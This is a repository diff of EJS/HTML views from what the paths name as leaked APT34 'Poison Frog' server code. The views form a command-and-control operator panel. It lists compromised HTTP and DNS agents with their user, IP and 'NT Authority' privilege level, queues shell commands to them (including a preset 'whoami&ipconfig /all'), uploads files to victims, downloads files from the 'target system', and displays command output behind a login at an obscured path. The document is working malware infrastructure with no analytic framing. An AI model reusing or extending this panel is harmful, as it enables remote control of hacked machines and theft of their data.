var agentDescription = e.target.value;
var agentId = e.target.getAttribute("class");
var form = document.createElement("form");
form.setAttribute("method", "post");
form.setAttribute("action", "/des");
var hiddenField = document.createElement("input");
hiddenField.setAttribute("type", "hidden");
hiddenField.setAttribute("name", "agentId");
hiddenField.setAttribute("value", agentId);
form.appendChild(hiddenField);
var hiddenField1 = document.createElement("input");
hiddenField1.setAttribute("type", "hidden");
hiddenField1.setAttribute("name", "agentDescription");
hiddenField1.setAttribute("value", agentDescription);
form.appendChild(hiddenField1);
document.body.appendChild(form);
form.submit();
return false;
}
}
var auto_refresh = setInterval(
function (){
location.reload();
}, 120000);
</script>
</head>
<body>
<div id="header">
<div class="shell">
<!-- Logo + Top Nav -->
<div id="top">
<h1>Prepare for poison.</h1>
<div id="top-navigation">
Welcome to <strong>Poison Frog</strong> panel.
<span>|</span>
<a href="#">Help</a>
<span>|</span>
<a href="#">Log out</a>
</div>
</div>
<!-- End Logo + Top Nav -->
<!-- Main Nav -->
<div id="navigation">
<ul>
<li onClick="javascript:window.location.href='/in/http'" <% if(state =='httpActive') { %> class="active" <% } %>><span>HTTP agents</span></li>
<li onClick="javascript:window.location.href='/in/dns'" <% if(state =='dnsActive') { %> class="active" <% } %>><span>DNS agents</span></li>
</ul>
</div>
<!-- End Main Nav -->
</div>
</div>
<!-- End Header -->
<!-- Container -->
<div id="container">
<div class="shell">
<!-- Main -->
<div id="main">
<div class="cl">&nbsp;</div>
<!-- Content -->
<!-- <div id="content"> -->
<div class="box">
<!-- Box Head -->
<div class="box-head">
<h2 class="left">Count: <%= agents.length %></h2>
<div class="right">
<!--<label>search articles</label>
<input type="text" class="field small-field" />
<input type="submit" class="button" value="search" />-->
</div>
</div>
<!-- End Box Head -->
<!-- Table -->
<div class="table">
<table width="100%" border="0" cellspacing="0" cellpadding="0" id="myTable">
<tr>
<th width="13"><input type="checkbox" class="checkbox" /></th>
<th onclick="sortTable(1)">Title</th>
<th onclick="sortTable(2)">Date</th>
<th onclick="sortTable(3)">State</th>
<th onclick="sortTable(4)">Description</th>
<th onclick="sortTable(5)">Access Levels</th>
<th width="110" class="ac">Content Control</th>
</tr>
<% for(var i=0; i < agents.length; i++) { %>
<tr style="cursor: pointer;<%= agents[i][5] %>" ><!-- class="odd" -->
<td onClick="javascript:window.location.href='/<%= agents[i][4] %><><%= agents[i][0] %>'" ><input type="checkbox" class="checkbox" /></td>
<td onClick="javascript:window.location.href='/<%= agents[i][4] %><><%= agents[i][0] %>'" ><h3><%= agents[i][0] %></h3></td>
<td onClick="javascript:window.location.href='/<%= agents[i][4] %><><%= agents[i][0] %>'" ><%= agents[i][2] %></td>
<td onClick="javascript:window.location.href='/<%= agents[i][4] %><><%= agents[i][0] %>'" ><%= agents[i][3] %></td>
<td ><input id="description" style="border:none;font-size: 16px;" class="<%= agents[i][0] %>" type="input" onkeypress="return saveDescription(event)" value="<%= agents[i][6] %>"></input></td>
<td onClick="javascript:window.location.href='/<%= agents[i][4] %><><%= agents[i][0] %>'" ><%if(agents[i][0].charAt(4).toUpperCase() =="N"&&agents[i][0].charAt(5).toUpperCase() =="T") {%>NT Autority<%}else{%>User<%}%></td>
<td onClick="javascript:window.location.href='/delagent/<%= agents[i][4] %><><%= agents[i][0] %>'"><a class="ico del">Delete</a></td>
</tr>
<script>
function sortTable(n) {
var table, rows, switching, i, x, y, shouldSwitch, dir, switchcount = 0;
table = document.getElementById("myTable");
switching = true;
// Set the sorting direction to ascending:
dir = "asc";
/* Make a loop that will continue until
no switching has been done: */
while (switching) {
// Start by saying: no switching is done:
switching = false;
rows = table.rows;
/* Loop through all table rows (except the
first, which contains table headers): */
for (i = 1; i < (rows.length - 1); i++) {
// Start by saying there should be no switching:
shouldSwitch = false;
/* Get the two elements you want to compare,
one from current row and one from the next: */
x = rows[i].getElementsByTagName("TD")[n];
y = rows[i + 1].getElementsByTagName("TD")[n];
/* Check if the two rows should switch place,
based on the direction, asc or desc: */
if (dir == "asc") {
if (x.innerHTML.toLowerCase() > y.innerHTML.toLowerCase()) {
// If so, mark as a switch and break the loop:
shouldSwitch = true;
break;
}
} else if (dir == "desc") {
if (x.innerHTML.toLowerCase() < y.innerHTML.toLowerCase()) {
// If so, mark as a switch and break the loop:
shouldSwitch = true;
break;
}
}
}
if (shouldSwitch) {
/* If a switch has been marked, make the switch
and mark that a switch has been done: */
rows[i].parentNode.insertBefore(rows[i + 1], rows[i]);
switching = true;
// Each time a switch is done, increase this count by 1:
switchcount ++;
} else {
/* If no switching has been done AND the direction is "asc",
set the direction to "desc" and run the while loop again. */
if (switchcount == 0 && dir == "asc") {
dir = "desc";
switching = true;
}
}
}
}
</script>
<% } %>
</table>
</div>
<!-- Table -->
</div>
<!-- End Box -->
<!-- </div> -->
<!-- End Content -->
<!-- Sidebar
<div id="sidebar">
<!-- Box
<div class="box">
<!-- Box Head
<div class="box-head">
<h2>Management</h2>
</div>
<!-- End Box Head
<div class="box-content">
<div class="cl">&nbsp;</div>
<form action="/des/" enctype="multipart/form-data" method="POST">
<div class="buttons">
<label>Upload descrioption</label>
<input type="hidden" name="agentType" value="<% if(state =='httpActive') { %>http<% } else { %>dns<% } %>" />
<input type="file" name="uploadFile" />
<input type="submit" class="button" value="Upload" />
</div>
</form>
<!-- Sort
<div class="sort">
<label>Sort by</label>
<select class="field">
<option value="">Title</option>
</select>
<select class="field">
<option value="">Date</option>
</select>
<select class="field">
<option value="">Author</option>
</select>
</div>
End Sort
</div>
</div>
<!-- End Box
</div>
<!-- End Sidebar -->
<div class="cl">&nbsp;</div>
</div>
<!-- Main -->
</div>
</div>
<!-- End Container -->
<!-- Footer -->
<div id="footer">
<div class="shell">
<span class="left">&copy; Poison frog</span>
<span class="right">
Changed by <a href="#" target="_blank" title="The Sweetest CSS Templates WorldWide">Poison Frog Teams</a>
</span>
</div>
</div>
<!-- End Footer -->
</body>
</html>

29
APT34/APT34-LeakCode/posionfrog/serverside/views/login.ejs Normal file
View File

@@ -0,0 +1,29 @@
<!DOCTYPE html>
<html >
<head>
<meta charset="UTF-8">
<title>Login</title>
<link rel="stylesheet" href="css/login_style.css">
</head>
<body>
<div class="login">
<div class="login-screen">
<div class="app-title">
<h1>Login</h1>
</div>
<form action=/7345SDFHSALKJDFHNASLFSDA3423423SAD22 enctype="form-data" method="POST" class="login-form">
<div class="control-group">
<input type="text" class="login-field" name="username" value="" placeholder="username" id="login-name">
<label class="login-field-icon fui-user" for="login-name"></label>
</div>
<div class="control-group">
<input type="password" class="login-field" value="" name="password" placeholder="password" id="login-pass">
<label class="login-field-icon fui-lock" for="login-pass"></label>
</div>
<button class="btn btn-primary btn-large btn-block" type="submit">Login</button>
</form>
</div>
</div>
</body>
</html>

10
APT34/APT34-LeakCode/posionfrog/serverside/views/notfound.ejs Normal file
View File

@@ -0,0 +1,10 @@
<html>
<head>
<title>
Page not found!
</title>
</head>
<body>
<h1>Page not found!</h1>
</body>
</html>

442
APT34/APT34-LeakCode/posionfrog/serverside/views/panel.html Normal file
View File

@@ -0,0 +1,442 @@
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<title><%= agentDetails[0] %></title>
<link rel="stylesheet" href="css/style.css" type="text/css" media="all" />
<script>
window.onload = function() {
//console.log("start function");
var x = setInterval(function() {
var lasttime = new Date(document.getElementById("visitTime").innerHTML);
var now_time = new Date(document.getElementById("time_now").innerHTML);
var distance = now_time.getTime() - lasttime.getTime();
now_time.setSeconds(now_time.getSeconds() + 1);
document.getElementById("time_now").innerHTML = now_time.toString();
var days = Math.floor(distance / (1000 * 60 * 60 * 24));
var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60));
var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60));
var seconds = Math.floor((distance % (1000 * 60)) / 1000);
document.getElementById("timmer").innerHTML = days + "d " + hours + ":" + minutes + ":" + seconds;
}, 1000);
}
var auto_refresh = setInterval(
function (){
location.reload();
}, 120000);
function sendDefaultCommand() {
var f_agentId = document.getElementById("f_agentId").value;
var f_agentType = document.getElementById("f_agentType").value;
var f_commandId = document.getElementById("f_commandId").value;
console.log("hello");
var form = document.createElement("form");
form.setAttribute("method", "post");
form.setAttribute("action", "/");
if(f_agentType == "dns") {
var f_commandType = document.getElementById("f_commandType").value;
var hf1 = document.createElement("input");
hf1.setAttribute("type", "hidden");
hf1.setAttribute("name", "commandId");
hf1.setAttribute("value", f_commandId);
form.appendChild(hf1);
var hf2 = document.createElement("input");
hf2.setAttribute("type", "hidden");
hf2.setAttribute("name", "command");
hf2.setAttribute("value", "whoami & ipconfig /all");
form.appendChild(hf2);
var hf3 = document.createElement("input");
hf3.setAttribute("type", "hidden");
hf3.setAttribute("name", "agentId");
hf3.setAttribute("value", f_agentId);
form.appendChild(hf3);
var hf4 = document.createElement("input");
hf4.setAttribute("type", "hidden");
hf4.setAttribute("name", "agentType");
hf4.setAttribute("value", f_agentType);
form.appendChild(hf4);
/*var hf5 = document.createElement("input");
hf5.setAttribute("type", "hidden");
hf5.setAttribute("name", "commandType");
hf5.setAttribute("value", f_commandType);
form.appendChild(hf5);*/
var hf6 = document.createElement("input");
hf6.setAttribute("type", "hidden");
hf6.setAttribute("name", "defaultCommand");
hf6.setAttribute("value", "yes");
form.appendChild(hf6);
} else {
var hf1 = document.createElement("input");
hf1.setAttribute("type", "hidden");
hf1.setAttribute("name", "commandId");
hf1.setAttribute("value", f_commandId);
form.appendChild(hf1);
var hf2 = document.createElement("input");
hf2.setAttribute("type", "hidden");
hf2.setAttribute("name", "command");
hf2.setAttribute("value", "whoami&ipconfig /all");
form.appendChild(hf2);
var hf3 = document.createElement("input");
hf3.setAttribute("type", "hidden");
hf3.setAttribute("name", "agentId");
hf3.setAttribute("value", f_agentId);
form.appendChild(hf3);
var hf4 = document.createElement("input");
hf4.setAttribute("type", "hidden");
hf4.setAttribute("name", "agentType");
hf4.setAttribute("value", f_agentType);
form.appendChild(hf4);
/*var hf5 = document.createElement("input");
hf5.setAttribute("type", "hidden");
hf5.setAttribute("name", "commandType");
hf5.setAttribute("value", f_commandType);
form.appendChild(hf5);*/
var hf6 = document.createElement("input");
hf6.setAttribute("type", "hidden");
hf6.setAttribute("name", "defaultCommand");
hf6.setAttribute("value", "yes");
form.appendChild(hf6);
}
document.body.appendChild(form);
form.submit();
}
</script>
</head>
<body>
<div id="header">
<div class="shell">
<!-- Logo + Top Nav -->
<div id="top">
<h1>Prepare for poison.</h1>
<div id="top-navigation">
<!-- <span>|</span> -->
<span id="timmer">00:00</span>
Welcome to <strong>Poison Frog</strong> panel.
</div>
</div>
<!-- End Logo + Top Nav -->
<!-- Main Nav -->
<div id="navigation">
<ul>
<li onClick="javascript:window.location.href='/in/http'"> <span>HTTP agents</span></li>
<li onClick="javascript:window.location.href='/in/dns'" > <span>DNS agents</span></li>
</ul>
</div>
<!-- End Main Nav -->
</div>
</div>
<!-- End Header -->
<!-- Container -->
<div id="container" >
<div class="shell">
<br />
<!-- Main -->
<div id="main">
<div class="cl">&nbsp;</div>
<!-- Content -->
<div id="content">
<div class="box">
<!-- Box Head -->
<div class="box-head">
<h2>Agent Details</h2>
</div>
<!-- End Box Head -->
<form action="/" enctype="multipart/form-data" method="POST">
<!-- Form -->
<div>
<center> <table id="showdetil">
<tr><td><ul style="list-style-type: none;">
<li><h2>ID: <%= agentDetails[0] %></h2></li>
<li><h2>Whoami: <%= agentDetails[1] %></h2></li>
</ul>
</td><td>
<ul style="list-style-type: none;">
<li><h2>IP: <%= agentDetails[2] %></h2></li>
<li><h2><p id="time_now" hidden><%= current_time.toString() %></p><p id="visitTime" hidden><%= agentDetails[3].toString() %></p>LastTime: <%= agentDetails[3] %></h2></li>
</ul>
</td></tr>
</table> </center>
</div>
<!-- End Form -->
<!-- Form Buttons -->
<!-- End Form Buttons -->
</form>
</div>
<!-- Box -->
<div class="box">
<!-- Box Head -->
<div class="box-head">
<h2>Add New Command</h2>
</div>
<!-- End Box Head -->
<form action="/" enctype="multipart/form-data" method="POST">
<!-- Form -->
<div class="form">
<input id="f_agentId" name="agentId" type="hidden" value="<%= agentDetails[0] %>" />
<input id="f_commandId" name="commandId" type="hidden" value="<%= commandId %>" />
<input id="f_whoami" name="whoami" type="hidden" value="<%= agentDetails[1] %>" />
<input id="f_ip" name="ip" type="hidden" value="<%= agentDetails[2] %>" />
<input id="f_first" name="first" type="hidden" value="<%= agentDetails[3] %>" />
<input id="f_agentType" name="agentType" type="hidden" value="<%= agentDetails[4] %>" />
<p>
<label>Command</label>
<input type="text" name="command" class="field size1" />
</p>
<p>
<label>Upload File</label>
<input type="file" name="uploadFile" class="field size1" />
</p>
<p>
<label>Download File</label>
<input type="text" name="downloadAdr" placeholder="File address in target system" class="field size1" />
</p>
</div>
<!-- End Form -->
<!-- Form Buttons -->
<div id="form_buttons" class="buttons">
<input id="submit_button" type="submit" class="button" value="RUN" />
<% if(agentDetails[4]=="dns") { %><div id="commandTypeDiv"><input id="f_commandType" type="checkbox" name="commandType">Text Request</input> </div> <% } %>
</div>
<!-- End Form Buttons -->
</form>
</div>
<!-- End Box -->
<!-- Box -->
<div class="box">
<!-- Box Head -->
<div class="box-head" style="height: 42px; inline-height: 42px;" >
<h2 class="left">Count: <%= commands.length %></h2>
<div class="right">
<!-- <label>search articles</label>
<input type="text" class="field small-field" /> -->
<input id="default_button" onclick="sendDefaultCommand()" type="submit" class="button" value="Default Command"/>
</div>
</div>
<!-- End Box Head -->
<!-- Table -->
<!--<div class="table" id="command_table">-->
<div class="table">
<table id="command_table" width="100%" border="0" cellspacing="0" cellpadding="0" >
<tr>
<th width="13"><input type="checkbox" class="checkbox" /></th>
<th style="display:none;" >ID</th>
<th>Command/Upload/Download</th>
<!-- <th>Date</th> -->
<th>State</th>
<th width="110" class="ac">Delete</th>
</tr>
<% for(var i = commands.length-1 ; i > -1; i--) { %>
<tr style="cursor: pointer;" ><!-- class="odd" -->
<td class="" onClick="javascript:window.location.href='/res/<%= agentDetails[4] %>-<%= agentDetails[0] %>-<%= commands[i][0] %>'" ><input type="checkbox" class="checkbox" /><input type="hidden" name="commandId" value="<%= commands[i][0] %>" /></td>
<td style="display:none;" onClick="javascript:window.location.href='/<%= agentDetails[4] %><><%= commands[i][0] %>'" ><h3><%= commands[i][0] %></h3></td>
<td onClick="javascript:window.location.href='/res/<%= agentDetails[4] %>-<%= agentDetails[0] %>-<%= commands[i][0] %>'"><h3 id="comandBody" ><% if(commands[i][1] != "not") { %> <div id="command" title="Command: <%= commands[i][1] %>" >Command: <%= commands[i][1] %></div> <% } if(commands[i][2] != "not") { %> <div id="upload" title="Upload: <%= commands[i][2] %>" >Upload: <%= commands[i][2] %></div> <% } if(commands[i][4] != "not") { %> <div id="download" title="Download: <%= commands[i][4] %>" >Download: <%= commands[i][4] %></div> <% } %></h3></td>
<!-- <td onClick="javascript:window.location.href='/res/<%= agentDetails[4] %>-<%= agentDetails[0] %>-<%= commands[i][0] %>'"><%= (commands[i][0]).substr(0, 1)+"/"+(commands[i][0]).substr(1, 2)+"_"+(commands[i][0]).substr(3, 2)+":"+(commands[i][0]).substr(5, 2)+":"+(commands[i][0]).substr(7, 2) %></td> -->
<td onClick="javascript:window.location.href='/res/<%= agentDetails[4] %>-<%= agentDetails[0] %>-<%= commands[i][0] %>'"><% if(commands[i][(commands[i].length-1)]=="0") {%>In Queue<%} else if(commands[i][(commands[i].length-1)]=="01") {%>Sending<%} else if(commands[i][(commands[i].length-1)]=="1") {%>Sended<%} else if(commands[i][(commands[i].length-1)]=="12") {%>Receiving<%} else {%>Received<%}%></td>
<td onClick="javascript:window.location.href='/delcmd/<%= agentDetails[4] %>-<%= agentDetails[0] %>-<%= commands[i][0] %>'"><a class="ico del">Delete</a></td>
</tr>
<% } %>
</table>
<script>
function sortTable(n) {
var table, rows, switching, i, x, y, shouldSwitch, dir, switchcount = 0;
table = document.getElementById("command_table");
switching = true;
// Set the sorting direction to ascending:
dir = "asc";
/* Make a loop that will continue until
no switching has been done: */
while (switching) {
// Start by saying: no switching is done:
switching = false;
rows = table.rows;
/* Loop through all table rows (except the
first, which contains table headers): */
for (i = 1; i < (rows.length - 1); i++) {
// Start by saying there should be no switching:
shouldSwitch = false;
/* Get the two elements you want to compare,
one from current row and one from the next: */
x = rows[i].getElementsByTagName("TD")[n];
y = rows[i + 1].getElementsByTagName("TD")[n];
/* Check if the two rows should switch place,
based on the direction, asc or desc: */
if (dir == "asc") {
if (x.innerHTML.toLowerCase() > y.innerHTML.toLowerCase()) {
// If so, mark as a switch and break the loop:
shouldSwitch = true;
break;
}
} else if (dir == "desc") {
if (x.innerHTML.toLowerCase() < y.innerHTML.toLowerCase()) {
// If so, mark as a switch and break the loop:
shouldSwitch = true;
break;
}
}
}
if (shouldSwitch) {
/* If a switch has been marked, make the switch
and mark that a switch has been done: */
rows[i].parentNode.insertBefore(rows[i + 1], rows[i]);
switching = true;
// Each time a switch is done, increase this count by 1:
switchcount ++;
} else {
/* If no switching has been done AND the direction is "asc",
set the direction to "desc" and run the while loop again. */
if (switchcount == 0 && dir == "asc") {
dir = "desc";
switching = true;
}
}
}
}
</script>
</div>
<!-- Table -->
</div>
<!-- End Box -->
</div>
<div class="cl">&nbsp;</div>
</div>
<!-- Main -->
</div>
</div>
<!-- End Container -->
<!-- Footer -->
<div id="footer">
<div class="shell">
<span class="left">&copy; Poison frog</span>
<span class="right">
Changed by <a href="#" target="_blank" title="The Sweetest CSS Templates WorldWide">Poison Frogs Team</a>
</span>
</div>
</div>
<!-- End Footer -->
<script>
function sortTable2(n) {
var table, rows, switching, i, x, y, shouldSwitch, dir, switchcount = 0;
table = document.getElementById("command_table");
switching = true;
// Set the sorting direction to ascending:
dir = "asc";
/* Make a loop that will continue until
no switching has been done: */
while (switching) {
// Start by saying: no switching is done:
switching = false;
rows = table.rows;
/* Loop through all table rows (except the
first, which contains table headers): */
for (i = 1; i < (rows.length - 1); i++) {
// Start by saying there should be no switching:
shouldSwitch = false;
/* Get the two elements you want to compare,
one from current row and one from the next: */
x = rows[i].getElementsByTagName("TD")[n];
y = rows[i + 1].getElementsByTagName("TD")[n];
/* Check if the two rows should switch place,
based on the direction, asc or desc: */
if (true) {
if (x.innerHTML.toLowerCase() < y.innerHTML.toLowerCase()) {
// If so, mark as a switch and break the loop:
shouldSwitch = true;
break;
}
}
else if (dir == "desc") {
if (x.innerHTML.toLowerCase() > y.innerHTML.toLowerCase()) {
// If so, mark as a switch and break the loop:
shouldSwitch = true;
break;
}
}
}
if (shouldSwitch) {
/* If a switch has been marked, make the switch
and mark that a switch has been done: */
rows[i].parentNode.insertBefore(rows[i + 1], rows[i]);
switching = true;
// Each time a switch is done, increase this count by 1:
switchcount ++;
} else {
/* If no switching has been done AND the direction is "asc",
set the direction to "desc" and run the while loop again. */
if (switchcount == 0 && dir == "asc") {
dir = "desc";
switching = true;
}
}
}
}
document.getElementById("demo").innerHTML = sortTable2(1);
</script>
</body>
</html>

40
APT34/APT34-LeakCode/posionfrog/serverside/views/result.ejs Normal file
View File

@@ -0,0 +1,40 @@
<!DOCTYPE html>
<html>
<head>
<script>
function escapeHtml(text) {
return text
.replace(/&/g, "&amp;")
.replace(/</g, "&lt;")
.replace(/>/g, "&gt;")
.replace(/"/g, "&quot;")
.replace(/'/g, "&#039;");
}
window.onload = function() {
var data = document.getElementById("data").value;
var command = "not";
var result = "not";
console.log(data.split("<br/>").length);
if(data.split("<br/>").length < 2) {
command = data.split('\\n')[0];
result = data.split('\\n')[1];
} else {
command = data.split("<br/>")[0];
result = data.split("<br/>")[1];
}
document.getElementById("command").innerHTML ="<pre>Command:> " + escapeHtml(command.replace(/^/,"")) +"</pre>";
document.getElementById("result").innerHTML = "<pre>" + escapeHtml(result.trim().replace(/\<>$/, '')) + "</pre>";
};
</script>
</head>
<body style="background: black;color: green; font-size: 18px; font-weight: bold;">
<input id="data" type="hidden" value="<%= data %>"/>
<div id="command" style="padding: 5px;color: rgb(9, 155, 9); font-size: 18px; font-weight: bold;"></div><br/>
<div id="result" style="padding: 10px; padding-top: 0px; background: black;color: green; font-size: 18px; font-weight: bold;"></div>
</body>
</html>